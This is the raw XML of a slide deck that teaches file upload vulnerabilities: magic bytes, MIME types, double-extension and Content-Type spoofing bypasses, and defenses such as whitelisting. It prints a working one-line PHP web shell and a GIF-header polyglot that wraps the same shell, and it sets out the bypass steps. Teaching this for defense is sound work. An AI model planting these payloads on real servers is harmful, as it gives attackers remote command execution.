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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId13"/>
      <p:bold r:id="rId14"/>
      <p:italic r:id="rId15"/>
      <p:boldItalic r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId21"/>
      <p:bold r:id="rId2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66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="792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4404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346836"/>
            <a:ext cx="1097280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22446"/>
            <a:ext cx="10972800" cy="1986914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67213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77404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8220" y="2051686"/>
            <a:ext cx="12618720" cy="3423284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8220" y="5507356"/>
            <a:ext cx="12618720" cy="1800224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="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1690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5840" y="2190750"/>
            <a:ext cx="6217920" cy="52216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0" y="2190750"/>
            <a:ext cx="6217920" cy="52216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40827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438150"/>
            <a:ext cx="12618720" cy="1590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7746" y="2017396"/>
            <a:ext cx="6189344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7746" y="3006090"/>
            <a:ext cx="6189344" cy="44215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06640" y="2017396"/>
            <a:ext cx="6219826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06640" y="3006090"/>
            <a:ext cx="6219826" cy="44215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5796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58737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02323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9826" y="1184911"/>
            <a:ext cx="7406640" cy="5848350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37888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19826" y="1184911"/>
            <a:ext cx="7406640" cy="5848350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/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15861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30962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69880" y="438150"/>
            <a:ext cx="3154680" cy="697420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5840" y="438150"/>
            <a:ext cx="9281160" cy="697420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46184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1320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73842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55545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47587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63718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25813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29197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14065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76226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6344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5840" y="438150"/>
            <a:ext cx="12618720" cy="15906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40" y="2190750"/>
            <a:ext cx="12618720" cy="5221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903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</p:sldLayoutIdLst>
  <p:hf sldNum="0"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5420" y="1021437"/>
            <a:ext cx="7685961" cy="1301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The Hidden Dangers in File Uploads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215420" y="2635687"/>
            <a:ext cx="7685961" cy="35933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050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215420" y="2904362"/>
            <a:ext cx="7685961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comprehensive guide to file upload vulnerabilities and how attackers exploit weak validation mechanisms to compromise web applications.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69921"/>
            <a:ext cx="903017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How Do Computers Identify Files?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069425"/>
            <a:ext cx="322028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More Than Just a Name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2763917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Operating systems use different methods to recognize file types, each with distinct security implications. Understanding these mechanisms is crucial for implementing secure file upload systems.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3971687"/>
            <a:ext cx="3402330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Windows Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="462379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Primarily relies on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="175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file extension</a:t>
            </a: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(e.g., .docx, .jpg, .exe)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519076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Simple and user-friendly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93790" y="5632966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Visible in file names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93790" y="6075164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Easily modified or spoofed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793790" y="651736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Creates security vulnerabilities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7599521" y="3971687"/>
            <a:ext cx="408277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Linux &amp; macOS Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="462379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Primarily relies on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="175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magic bytes</a:t>
            </a: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—internal file signatures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7599521" y="519076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More reliable identification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7599521" y="5632966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Independent of filename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="6075164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Less obvious to users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="651736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Harder to spoof, but not impossible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56460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8066" y="3128724"/>
            <a:ext cx="5569982" cy="6411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Deep Dive: Magic Bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718066" y="3851910"/>
            <a:ext cx="3182064" cy="320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A File's Digital Fingerprint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718066" y="4480084"/>
            <a:ext cx="13194268" cy="6562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Magic bytes are the first few bytes of a file's content that uniquely identify its type. They act as a constant signature embedded in the file structure, regardless of what the filename claims.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718066" y="5367099"/>
            <a:ext cx="4261247" cy="2304574"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1335"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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923211" y="5572244"/>
            <a:ext cx="2564606" cy="320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JPEG Files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923211" y="6015752"/>
            <a:ext cx="3850957" cy="3433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Start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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FF D8 FF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923211" y="6482120"/>
            <a:ext cx="3850957" cy="6562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These bytes are always present at the beginning of every valid JPEG image file.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5184457" y="5367099"/>
            <a:ext cx="4261366" cy="2304574"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1335"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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5389602" y="5572244"/>
            <a:ext cx="2564606" cy="320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PNG Files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5389602" y="6015752"/>
            <a:ext cx="3851077" cy="3433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Start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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89 50 4E 47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5389602" y="6482120"/>
            <a:ext cx="3851077" cy="984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PNG signature includes readable ASCII characters "PNG" in the byte sequence.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9650968" y="5367099"/>
            <a:ext cx="4261366" cy="2304574"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1335"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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9856113" y="5572244"/>
            <a:ext cx="2564606" cy="320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PDF Files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9856113" y="6015752"/>
            <a:ext cx="3851077" cy="3433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Start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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%PDF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9856113" y="6482120"/>
            <a:ext cx="3851077" cy="984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human-readable signature that identifies Portable Document Format files.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00482"/>
            <a:ext cx="84949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MIME Types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1799987"/>
            <a:ext cx="698742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How Browsers and Servers Communicate File Types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2494478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MIME (Multipurpose Internet Mail Extensions) types provide a standardized way to declare file types in HTTP communications. This label is sent with requests and responses to tell the receiving system how to handle the content.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3475434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When a file is uploaded, the browser sends a Content-Type header declaring what type of file it claims to be:</a:t>
            </a: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793790" y="4093488"/>
            <a:ext cx="13042821" cy="2517458"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1352"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEF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82479" y="4093488"/>
            <a:ext cx="13065443" cy="2517458"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1352"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEF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009293" y="4263509"/>
            <a:ext cx="12611814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213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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POST /upload HTTP/1.1</a:t>
            </a:r>
          </a:p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213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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Host: example.com</a:t>
            </a:r>
          </a:p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213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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Content-Type: image/jpeg</a:t>
            </a:r>
          </a:p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213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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Content-Length: 12345...file data...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93790" y="6866096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server uses this information to validate and process the upload—but trusting it blindly creates serious security risks.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80668" y="456248"/>
            <a:ext cx="6800731" cy="518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50"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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The Attacker's Goal: The Web Shell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580668" y="1041083"/>
            <a:ext cx="3565327" cy="259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Why File Uploads are a Prime Target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80668" y="1698427"/>
            <a:ext cx="7919442" cy="5310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ultimate objective of most file upload attacks is to place a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="130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web shell</a:t>
            </a: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on the target server. A web shell is a malicious script that gives attackers the ability to execute arbitrary commands remotely.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80668" y="2378750"/>
            <a:ext cx="7919442" cy="265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0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What makes web shells dangerous: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80668" y="2793563"/>
            <a:ext cx="7919442" cy="265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Full remote command execution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80668" y="3117056"/>
            <a:ext cx="7919442" cy="265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File system access and manipulation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80668" y="3440549"/>
            <a:ext cx="7919442" cy="265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Database querying and exfiltration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80668" y="3764042"/>
            <a:ext cx="7919442" cy="265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Lateral movement to other systems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80668" y="4087535"/>
            <a:ext cx="7919442" cy="265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Persistent backdoor access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="130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2543" y="1735693"/>
            <a:ext cx="5144691" cy="5144691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580668" y="7253526"/>
            <a:ext cx="13469064" cy="265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Here's a simple one-line PHP web shell that demonstrates the power attackers gain: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580668" y="4724909"/>
            <a:ext cx="7314395" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEF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738307" y="4849329"/>
            <a:ext cx="13153787" cy="265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00" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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 system($_GET['cmd']); ?&gt;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580668" y="8406527"/>
            <a:ext cx="13469064" cy="265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This single line allows an attacker to run any system command by visiting: shell.php?cmd=ls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38922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9012" y="2914769"/>
            <a:ext cx="10450711" cy="5973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7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Vulnerability #1: The Double Extension Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669012" y="3588544"/>
            <a:ext cx="4003834" cy="298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Tricking the Server with Filenames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669012" y="4173855"/>
            <a:ext cx="13292376" cy="320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Attackers exploit weak validation by crafting filenames like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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shell.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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to bypass security filters that only check the final extension.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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012" y="4709874"/>
            <a:ext cx="4430792" cy="7645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60108" y="5665470"/>
            <a:ext cx="2389227" cy="298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Upload Attempt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860108" y="6078736"/>
            <a:ext cx="4048601" cy="320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Attacker uploads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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shell.php.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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9804" y="4709874"/>
            <a:ext cx="4430792" cy="7645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290899" y="5665470"/>
            <a:ext cx="2389227" cy="298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Filter Check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5290899" y="6078736"/>
            <a:ext cx="4048601" cy="626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Validation sees </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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extension and allows upload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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30596" y="4709874"/>
            <a:ext cx="4430792" cy="76450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721691" y="5665470"/>
            <a:ext cx="2389227" cy="298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Server Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9721691" y="6078736"/>
            <a:ext cx="4048601" cy="626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Misconfigured server reads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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and executes malicious code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669012" y="7111603"/>
            <a:ext cx="13292376" cy="611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This attack is particularly effective against older Apache configurations with improper MultiViews settings or servers that process extensions from left to right.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3150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07787" y="488275"/>
            <a:ext cx="7901226" cy="1109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4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Vulnerability #2: MIME Type Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107787" y="1668899"/>
            <a:ext cx="3138964" cy="2774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Lying About the Content-Type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6107787" y="2212538"/>
            <a:ext cx="7901226" cy="567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Attackers can intercept upload requests and manipulate the Content-Type header to deceive poorly implemented validation systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307455" y="2980134"/>
            <a:ext cx="22860" cy="3995499"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 116510"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD2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6484322" y="3168372"/>
            <a:ext cx="532567" cy="22860"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 116510"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD2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6107728" y="2980134"/>
            <a:ext cx="399455" cy="399455"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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6174284" y="3013353"/>
            <a:ext cx="266224" cy="332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20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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="3041094"/>
            <a:ext cx="3033951" cy="2774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Step 1: Prepare Malicious File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7195304" y="3424952"/>
            <a:ext cx="6813709" cy="291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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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containing web shell code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6484322" y="4259818"/>
            <a:ext cx="532567" cy="22860"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 116510"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD2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6107728" y="4071580"/>
            <a:ext cx="399455" cy="399455"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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6174284" y="4104799"/>
            <a:ext cx="266224" cy="332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20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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="4132540"/>
            <a:ext cx="2556391" cy="2774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Step 2: Intercept Request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7195304" y="4516398"/>
            <a:ext cx="6813709" cy="2839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Use Burp Suite or similar proxy to capture the upload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484322" y="5343644"/>
            <a:ext cx="532567" cy="22860"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 116510"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD2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6107728" y="5155406"/>
            <a:ext cx="399455" cy="399455"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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6174284" y="5188625"/>
            <a:ext cx="266224" cy="332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20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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="5216366"/>
            <a:ext cx="2281238" cy="2774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Step 3: Modify Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="5600224"/>
            <a:ext cx="6813709" cy="291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Change Content-Type from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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application/x-php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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image/jpeg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484322" y="6435090"/>
            <a:ext cx="532567" cy="22860"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 116510"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD2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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107728" y="6246852"/>
            <a:ext cx="399455" cy="399455"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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6174284" y="6280071"/>
            <a:ext cx="266224" cy="332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20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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="6307812"/>
            <a:ext cx="2630805" cy="2774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Step 4: Bypass Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7195304" y="6691670"/>
            <a:ext cx="6813709" cy="2839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Server trusts the spoofed header and accepts malicious file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107787" y="7175302"/>
            <a:ext cx="7901226" cy="567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Applications that rely solely on client-provided MIME types are fundamentally insecure, as this header is completely under attacker control.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0767" y="330637"/>
            <a:ext cx="6029444" cy="3757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Vulnerability #3: Magic Byte Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420767" y="754380"/>
            <a:ext cx="2799278" cy="1877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1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Hiding a Shell Behind a Valid Signature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420767" y="1122402"/>
            <a:ext cx="13788866" cy="192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9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most sophisticated bypass technique involves prepending legitimate magic bytes to malicious code, fooling validation that checks file signatures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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767" y="1585317"/>
            <a:ext cx="6043613" cy="604361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765369" y="1558171"/>
            <a:ext cx="7451765" cy="192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90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How it works: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6765369" y="1858685"/>
            <a:ext cx="7451765" cy="192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9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Attackers create a polyglot file that appears valid to magic byte checkers but executes as code when processed by the server.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6765369" y="2159198"/>
            <a:ext cx="7451765" cy="192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9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server reads the magic bytes first and validates the file, but the interpreter ignores the header and executes the embedded code.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420767" y="7899440"/>
            <a:ext cx="13788866" cy="1527096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1181"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEF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414814" y="7899440"/>
            <a:ext cx="13800773" cy="1527096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1181"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEF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534948" y="7989570"/>
            <a:ext cx="13560504" cy="1346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900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1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GIF89a;&lt;?php// Server validation sees valid GIF signature above// PHP interpreter ignores the GIF headerecho "System compromised!";system($_GET['cmd']); // Web shell?&gt;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420767" y="9561790"/>
            <a:ext cx="13788866" cy="192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9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This file passes magic byte validation as a GIF but executes as PHP if uploaded to an accessible location.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2706" y="700088"/>
            <a:ext cx="8745736" cy="618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8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Defense in Depth: Secure File Uploads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692706" y="1397794"/>
            <a:ext cx="4033718" cy="3168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How to Build a Secure Uploader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000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🛡️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692706" y="2011442"/>
            <a:ext cx="13244989" cy="316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Implementing robust file upload security requires multiple overlapping validation layers. No single check is sufficient—defense in depth is essential.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692706" y="2847618"/>
            <a:ext cx="4283035" cy="2410301"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCF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706" y="2824758"/>
            <a:ext cx="4283035" cy="91440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7281" y="2550795"/>
            <a:ext cx="593765" cy="59376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715399" y="2699266"/>
            <a:ext cx="237530" cy="296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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913448" y="3342442"/>
            <a:ext cx="2867382" cy="309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Whitelist, Don't Blacklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913448" y="3770352"/>
            <a:ext cx="3841552" cy="1266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Only allow a specific list of safe file extensions (e.g., .jpg, .png, .pdf). Never try to block dangerous extensions—attackers will find workarounds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5173623" y="2847618"/>
            <a:ext cx="4283035" cy="2410301"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCF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3623" y="2824758"/>
            <a:ext cx="4283035" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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8199" y="2550795"/>
